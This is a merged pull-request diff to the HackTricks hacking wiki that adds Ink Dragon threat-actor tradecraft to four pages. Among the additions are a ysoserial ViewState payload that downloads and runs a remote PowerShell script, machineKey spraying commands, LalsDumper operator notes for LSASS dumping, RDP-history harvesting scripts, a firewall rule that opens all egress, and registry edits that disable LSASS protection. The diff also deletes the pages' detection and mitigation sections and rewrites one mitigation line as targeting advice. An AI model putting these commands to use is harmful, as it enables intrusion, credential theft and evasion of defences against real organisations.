Merge pull request #1680 from HackTricks-wiki/update_Inside_Ink_Dragon__Revealing_the_Relay_Network_and_20251216_184124

Inside Ink Dragon Revealing the Relay Network and Inner Work...

Author: carlospolop

src/generic-hacking/tunneling-and-port-forwarding.md

@@ -816,6 +816,29 @@ Because Tiny Core is stateless, attackers usually:
 • Block outbound connections that originate from `qemu-system*.exe`.  
 • Hunt for rare listening ports (2222, 10022, …) binding immediately after a QEMU launch.
 
+## IIS/HTTP.sys relay nodes via `HttpAddUrl` (ShadowPad)
+
+Ink Dragon’s ShadowPad IIS module turns every compromised perimeter web server into a dual-purpose **backdoor + relay** by binding covert URL prefixes directly at the HTTP.sys layer:
+
+* **Config defaults** – if the module’s JSON config omits values, it falls back to believable IIS defaults (`Server: Microsoft-IIS/10.0`, `DocumentRoot: C:\inetpub\wwwroot`, `ErrorPage: C:\inetpub\custerr\en-US\404.htm`). That way benign traffic is answered by IIS with the correct branding.
+* **Wildcard interception** – operators supply a semicolon-separated list of URL prefixes (wildcards in host + path). The module calls `HttpAddUrl` for each entry, so HTTP.sys routes matching requests to the malicious handler *before* the request reaches IIS modules.
+* **Encrypted first packet** – the first two bytes of the request body carry the seed for a custom 32-bit PRNG. Every subsequent byte is XOR-ed with the generated keystream before protocol parsing:
+
+  ```python
+  def decrypt_first_packet(buf):
+      seed = buf[0] | (buf[1] << 8)
+      num = seed & 0xFFFFFFFF
+      out = bytearray(buf)
+      for i in range(2, len(out)):
+          hi = (num >> 16) & 0xFFFF
+          num = (hi * 0x7093915D - num * 0x6EA30000 + 0x06B0F0E3) & 0xFFFFFFFF
+          out[i] ^= num & 0xFF
+      return out
+  ```
+
+* **Relay orchestration** – the module maintains two lists: “servers” (upstream nodes) and “clients” (downstream implants). Entries are pruned if no heartbeat arrives within ~30 seconds. When both lists are non-empty, it pairs the first healthy server with the first healthy client and simply pipes bytes between their sockets until one side closes.
+* **Debug telemetry** – optional logging records source IP, destination IP, and total forwarded bytes for each pairing. Investigators used those breadcrumbs to rebuild the ShadowPad mesh spanning multiple victims.
+
 ---
 
 ## Other tools to check
@@ -827,6 +850,7 @@ Because Tiny Core is stateless, attackers usually:
 
 - [Hiding in the Shadows: Covert Tunnels via QEMU Virtualization](https://trustedsec.com/blog/hiding-in-the-shadows-covert-tunnels-via-qemu-virtualization)
 - [Check Point Research – Before ToolShell: Exploring Storm-2603’s Previous Ransomware Operations](https://research.checkpoint.com/2025/before-toolshell-exploring-storm-2603s-previous-ransomware-operations/)
+- [Check Point Research – Inside Ink Dragon: Revealing the Relay Network and Inner Workings of a Stealthy Offensive Operation](https://research.checkpoint.com/2025/ink-dragons-relay-network-and-offensive-operation/)
 
 {{#include ../banners/hacktricks-training.md}}
 

src/network-services-pentesting/pentesting-web/microsoft-sharepoint.md

@@ -57,6 +57,15 @@ Sending a crafted `Source` parameter to `ToolPane.aspx` (e.g. `../../../../web.c
 * `<machineKey validationKey="…" decryptionKey="…">`  ➜ forge ViewState / ASPXAUTH cookies
 * connection strings & secrets.
 
+### 2.5 ToolShell workflow observed in Ink Dragon intrusions
+
+Check Point mapped how Ink Dragon operationalised the ToolShell chain months before Microsoft shipped fixes:
+
+* **Header spoofing for auth bypass** – the actor sends POSTs to `/_layouts/15/ToolPane.aspx` with `Referer: https://<victim>/_layouts/15/` plus a fake `X-Forms_BaseUrl`. Those headers convince SharePoint that the request originates from a trusted layout and completely skip front-door authentication (CVE-2025-49706/CVE-2025-53771).
+* **Serialized gadget in the same request** – the body includes attacker-controlled ViewState/ToolPart data that reaches the vulnerable server-side formatter (CVE-2025-49704/CVE-2025-53770). The payload is usually a ysoserial.net chain that runs inside `w3wp.exe` without ever touching disk.
+* **Internet-scale scanning** – telemetry from July 2025 shows them enumerating every reachable `/_layouts/15/ToolPane.aspx` endpoint and replaying a dictionary of leaked `<machineKey>` pairs. Any site that copied a sample `validationKey` from documentation can be compromised even if it is otherwise fully patched (see the ViewState page for the signing workflow).
+* **Immediate staging** – successful exploitation drops a loader or PowerShell stager that: (1) dumps every `web.config`, (2) plants an ASPX webshell for contingency access, and (3) schedules a local Potato privesc to escape the IIS worker.
+
 ## 3. Post-exploitation recipes observed in the wild
 
 ### 3.1 Exfiltrate every *.config* file (variation-1)
@@ -149,30 +158,28 @@ Recent incident-response investigations (Unit42 “Project AK47”) show how att
 > [!INFO]
 > The same static Tox ID found in X2ANYLOCK appears in leaked LockBit databases, suggesting affiliate overlap.
 
----
+### 3.5 Turning SharePoint loot into lateral movement
 
-## 4. Detection ideas
+* **Decrypt every protected section** – once seated on the web tier, abuse `aspnet_regiis.exe -px "connectionStrings" C:\\temp\\conn.xml -pri` (or `-px "appSettings"`) to dump the clear-text secrets hiding behind `<connectionStrings configProtectionProvider="RsaProtectedConfigurationProvider">`. Ink Dragon repeatedly harvested SQL logins, SMTP relays and custom service credentials this way.
+* **Recycle app-pool accounts across farms** – many enterprises reuse the same domain account for `IIS APPPOOL\SharePoint` on every front-end. After decrypting `identity impersonate="..."` blocks or reading `ApplicationHost.config`, test the credential over SMB/RDP/WinRM to every sibling server. In multiple incidents the account was also a local administrator, allowing `psexec`, `sc create`, or scheduled-task staging without triggering password sprays.
+* **Abuse leaked `<machineKey>` values internally** – even if the internet perimeter gets patched, reusing the same `validationKey`/`decryptionKey` allows lateral ViewState exploitation between internal SharePoint zones that trust each other.
 
-| Telemetry | Why it is suspicious |
-|-----------|----------------------|
-| `w3wp.exe → cmd.exe`             | Worker process should rarely spawn shell  |
-| `cmd.exe → powershell.exe -EncodedCommand` | Classic lolbin pattern           |
-| File events creating `debug_dev.js` or `spinstall0.aspx` | IOCs straight from ToolShell |
-| `ProcessCmdLine CONTAINS ToolPane.aspx` (ETW/Module logs) | Public PoCs invoke this page |
+### 3.6 Persistence patterns witnessed in 2025 intrusions
 
-Example XDR / Sysmon rule (pseudo-XQL):
+* **Scheduled tasks** – a one-shot task named `SYSCHECK` (or other health-themed names) is created with `/ru SYSTEM /sc once /st <hh:mm>` to bootstrap the next-stage loader (commonly a renamed `conhost.exe`). Because it is run-once, telemetry often misses it unless historic task XML is preserved.
+* **Masqueraded services** – services such as `WindowsTempUpdate`, `WaaSMaintainer`, or `MicrosoftTelemetryHost` are installed via `sc create` pointing at the sideloading triad directory. The binaries keep their original AMD/Realtek/NVIDIA signatures but are renamed to match Windows components; comparing the on-disk name with the `OriginalFileName` PE field is a quick integrity check.
 
-```
-proc where parent_process_name="w3wp.exe" and process_name in ("cmd.exe","powershell.exe")
+### 3.7 Host firewall downgrades for relay traffic
+
+Ink Dragon routinely adds a permissive outbound rule that masquerades as Defender maintenance so ShadowPad/FinalDraft traffic can exit on any port:
+
+```cmd
+netsh advfirewall firewall add rule name="Microsoft MsMpEng" dir=out action=allow program="C:\ProgramData\Microsoft\Windows Defender\MsMpEng.exe" enable=yes profile=any
 ```
 
-## 5. Hardening & Mitigation
+Because the rule is created locally (not via GPO) and uses the legitimate Defender binary as `program=`, most SOC baselines ignore it, yet it opens **Any ➜ Any** egress.
 
-1. **Patch** – July 2025 security updates fix *all* four CVEs.
-2. **Rotate** every `<machineKey>` and `ViewState` secrets after compromise.
-3. Remove *LAYOUTS* write permission from `WSS_WPG` & `WSS_ADMIN_WPG` groups.
-4. Block external access to `/_layouts/15/ToolPane.aspx` at proxy/WAF level.
-5. Enable **ViewStateUserKey**, **MAC enabled**, and custom *EventValidation*.
+---
 
 ## Related tricks
 
@@ -189,5 +196,6 @@ proc where parent_process_name="w3wp.exe" and process_name in ("cmd.exe","powers
 - [Microsoft Security Advisory – CVE-2025-49704 / 49706](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-49704)
 - [Unit42 – Project AK47 / SharePoint Exploitation & Ransomware Activity](https://unit42.paloaltonetworks.com/ak47-activity-linked-to-sharepoint-vulnerabilities/)
 - [Microsoft Security Advisory – CVE-2025-53770 / 53771](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-53770)
+- [Check Point Research – Inside Ink Dragon: Revealing the Relay Network and Inner Workings of a Stealthy Offensive Operation](https://research.checkpoint.com/2025/ink-dragons-relay-network-and-offensive-operation/)
 
 {{#include ../../banners/hacktricks-training.md}}

src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md

@@ -126,6 +126,29 @@ In cases where `_VIEWSTATEGENERATOR` parameter **isn't sent** by the server you
 --apppath="/" --path="/hello.aspx"
 ```
 
+### Exploiting recycled `<machineKey>` values at scale
+
+Ink Dragon (2025) demonstrated how dangerous it is when administrators **copy the sample `<machineKey>` blocks published in Microsoft docs, StackOverflow answers or vendor blogs**. Once a single target leaks or reuses those keys across the farm, every other ASP.NET page that trusts ViewState can be hijacked remotely without any additional vulnerability.
+
+1. **Build a candidate wordlist** with the leaked `validationKey`/`decryptionKey` pairs (e.g. scrape public repos, Microsoft blog posts, or keys recovered from one host in the farm) and feed it to Blacklist3r/Badsecrets:
+
+   ```bash
+   AspDotNetWrapper.exe --keypath reused_machinekeys.txt --url https://target/_layouts/15/ToolPane.aspx --decrypt --purpose=viewstate --modifier=<VIEWSTATEGENERATOR>
+   # or let Badsecrets spray the list
+   bbot -f subdomain-enum -m badsecrets --badsecrets-keylist reused_machinekeys.txt -t sharepoint.customer.tld
+   ```
+
+   The tooling repeatedly signs a benign `__VIEWSTATE` blob with each candidate key until the server accepts the MAC, proving the key is valid.
+2. **Forge the malicious ViewState** once the key pair is known. If encryption is disabled you only need the `validationKey`. If encryption is enabled, include the matching `decryptionKey` so the payload survives the decrypt → deserialize path:
+
+   ```bash
+   ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell -c iwr http://x.x.x.x/a.ps1|iex" \
+      --validationkey "$VALIDATION" --decryptionkey "$DECRYPTION" --validationalg="SHA1" --generator=<VIEWSTATEGENERATOR>
+   ```
+
+   Operators often embed disk-resident launchers (e.g. PrintNotifyPotato, ShadowPad loaders, etc.) straight in the payload because it executes as the IIS worker (`w3wp.exe`).
+3. **Pivot laterally** by recycling the same `<machineKey>` across sibling SharePoint/IIS nodes. Once one server is compromised you can replay the key to hit every other server that never rotated its configuration.
+
 ### Test Case: 3 – .Net < 4.5 and EnableViewStateMac=true/false and ViewStateEncryptionMode=true
 
 In this it's not known if the parameter is protected with MAC. Then, the value is probably encrypted and you will **need the Machine Key to encrypt your payload** to exploit the vulnerability.
@@ -249,7 +272,7 @@ ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "whoami" \
   --generator=<VIEWSTATEGEN> --minify
 ```
 
-Rotating static keys or switching to *AutoGenerate* keys in Web .config (`<machineKey ... validationKey="AutoGenerate" decryptionKey="AutoGenerate" />`) mitigates this class of attacks.
+Targets that keep reusing the same static keys across farms stay vulnerable indefinitely; once they migrate to `AutoGenerate` values the spray technique dies, so prioritize legacy deployments that still expose hard-coded material.
 
 ### CVE-2025-30406 – Gladinet CentreStack / Triofox hard-coded keys
 Kudelski Security uncovered that multiple CentreStack / Triofox releases shipped with identical `machineKey` values, enabling unauthenticated remote code execution through ViewState forgery (CVE-2025-30406).
@@ -281,6 +304,7 @@ Fixed in CentreStack 16.4.10315.56368 / Triofox 16.4.10317.56372 – upgrade or
 - [**https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/**](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)
 - [**https://blog.blacklanternsecurity.com/p/introducing-badsecrets**](https://blog.blacklanternsecurity.com/p/introducing-badsecrets)
 - [SharePoint “ToolShell” exploitation chain (Eye Security, 2025)](https://research.eye.security/sharepoint-under-siege/)
+- [Check Point Research – Inside Ink Dragon: Revealing the Relay Network and Inner Workings of a Stealthy Offensive Operation](https://research.checkpoint.com/2025/ink-dragons-relay-network-and-offensive-operation/)
 
 
 

src/windows-hardening/stealing-credentials/README.md

@@ -126,6 +126,22 @@ Get-Process -Name LSASS
 PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234
 ```
 
+## LalsDumper – SSP-based LSASS dumping without MiniDumpWriteDump
+
+Ink Dragon ships a three-stage dumper dubbed **LalsDumper** that never calls `MiniDumpWriteDump`, so EDR hooks on that API never fire:
+
+1. **Stage 1 loader (`lals.exe`)** – searches `fdp.dll` for a placeholder consisting of 32 lower-case `d` characters, overwrites it with the absolute path to `rtu.txt`, saves the patched DLL as `nfdp.dll`, and calls `AddSecurityPackageA("nfdp","fdp")`. This forces **LSASS** to load the malicious DLL as a new Security Support Provider (SSP).
+2. **Stage 2 inside LSASS** – when LSASS loads `nfdp.dll`, the DLL reads `rtu.txt`, XORs each byte with `0x20`, and maps the decoded blob into memory before transferring execution.
+3. **Stage 3 dumper** – the mapped payload re-implements MiniDump logic using **direct syscalls** resolved from hashed API names (`seed = 0xCD7815D6; h ^= (ch + ror32(h,8))`). A dedicated export named `Tom` opens `%TEMP%\<pid>.ddt`, streams a compressed LSASS dump into the file, and closes the handle so exfiltration can happen later.
+
+Operator notes:
+
+* Keep `lals.exe`, `fdp.dll`, `nfdp.dll`, and `rtu.txt` in the same directory. Stage 1 rewrites the hard-coded placeholder with the absolute path to `rtu.txt`, so splitting them breaks the chain.
+* Registration happens by appending `nfdp` to `HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages`. You can seed that value yourself to make LSASS reload the SSP every boot.
+* `%TEMP%\*.ddt` files are compressed dumps. Decompress locally, then feed them to Mimikatz/Volatility for credential extraction.
+* Running `lals.exe` requires admin/SeTcb rights so `AddSecurityPackageA` succeeds; once the call returns, LSASS transparently loads the rogue SSP and executes Stage 2.
+* Removing the DLL from disk does not evict it from LSASS. Either delete the registry entry and restart LSASS (reboot) or leave it for long-term persistence.
+
 ## CrackMapExec
 
 ### Dump SAM hashes
@@ -321,9 +337,54 @@ type outpwdump
 
 Download it from:[ http://www.tarasco.org/security/pwdump_7](http://www.tarasco.org/security/pwdump_7) and just **execute it** and the passwords will be extracted.
 
-## Defenses
+## Mining idle RDP sessions and weakening security controls
+
+Ink Dragon’s FinalDraft RAT includes a `DumpRDPHistory` tasker whose techniques are handy for any red-teamer:
+
+### DumpRDPHistory-style telemetry collection
+
+* **Outbound RDP targets** – parse every user hive at `HKU\<SID>\SOFTWARE\Microsoft\Terminal Server Client\Servers\*`. Each subkey stores the server name, `UsernameHint`, and the last write timestamp. You can replicate FinalDraft’s logic with PowerShell:
+
+  ```powershell
+  Get-ChildItem HKU:\ | Where-Object { $_.Name -match "S-1-5-21" } | ForEach-Object {
+      Get-ChildItem "${_.Name}\SOFTWARE\Microsoft\Terminal Server Client\Servers" -ErrorAction SilentlyContinue |
+        ForEach-Object {
+            $server = Split-Path $_.Name -Leaf
+            $user = (Get-ItemProperty $_.Name).UsernameHint
+            "OUT:$server:$user:$((Get-Item $_.Name).LastWriteTime)"
+        }
+  }
+  ```
+
+* **Inbound RDP evidence** – query the `Microsoft-Windows-TerminalServices-LocalSessionManager/Operational` log for Event IDs **21** (successful logon) and **25** (disconnect) to map who administered the box:
+
+  ```powershell
+  Get-WinEvent -LogName "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational" \
+    | Where-Object { $_.Id -in 21,25 } \
+    | Select-Object TimeCreated,@{n='User';e={$_.Properties[1].Value}},@{n='IP';e={$_.Properties[2].Value}}
+  ```
+
+Once you know which Domain Admin regularly connects, dump LSASS (with LalsDumper/Mimikatz) while their **disconnected** session still exists. CredSSP + NTLM fallback leaves their verifier and tokens in LSASS, which can then be replayed over SMB/WinRM to grab `NTDS.dit` or stage persistence on domain controllers.
+
+### Registry downgrades targeted by FinalDraft
+
+The same implant also tampers with several registry keys to make credential theft easier:
+
+```cmd
+reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 1 /f
+reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
+reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v DSRMAdminLogonBehavior /t REG_DWORD /d 2 /f
+reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL /t REG_DWORD /d 0 /f
+```
+
+* Setting `DisableRestrictedAdmin=1` forces full credential/ticket reuse during RDP, enabling pass-the-hash style pivots.
+* `LocalAccountTokenFilterPolicy=1` disables UAC token filtering so local admins get unrestricted tokens over the network.
+* `DSRMAdminLogonBehavior=2` lets the DSRM administrator log on while the DC is online, giving attackers another built-in high-privilege account.
+* `RunAsPPL=0` removes LSASS PPL protections, making memory access trivial for dumpers such as LalsDumper.
+
+## References
 
-[**Learn about some credentials protections here.**](credentials-protections.md)
+- [Check Point Research – Inside Ink Dragon: Revealing the Relay Network and Inner Workings of a Stealthy Offensive Operation](https://research.checkpoint.com/2025/ink-dragons-relay-network-and-offensive-operation/)
 
 {{#include ../../banners/hacktricks-training.md}}